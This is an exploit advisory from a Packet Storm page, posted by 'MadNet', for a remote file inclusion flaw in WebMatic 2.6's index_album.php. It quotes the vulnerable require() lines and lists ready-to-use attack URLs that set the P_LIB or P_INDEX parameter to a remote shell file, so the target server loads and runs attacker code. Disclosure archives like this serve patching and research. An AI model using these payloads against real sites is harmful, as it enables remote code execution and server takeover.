WebMatic versions 2.6 suffers from a remote file inclusion vulnerability in index_album.php.
6a61e184322c0062700965c236178a156a7a13dd14e80d5339ed593408875447-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6
#Author : MadNet
#Contact : MadNet[at]Hackertr[Dot]org
#S.Page : www.valarsoft.com :)
--------------------------------------*******************-----------------------------------------------------------
Error1 : require($P_LIB."lib_album.php");
Error2 : require($P_INDEX."page_album.inc");
[[RFI]]
http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]
http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]
-------------------------------------------------
Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt
Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
-- MadNet From Turkey & Cyber-Sabotger Orgeneral --
--Thanks Milw0rm
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed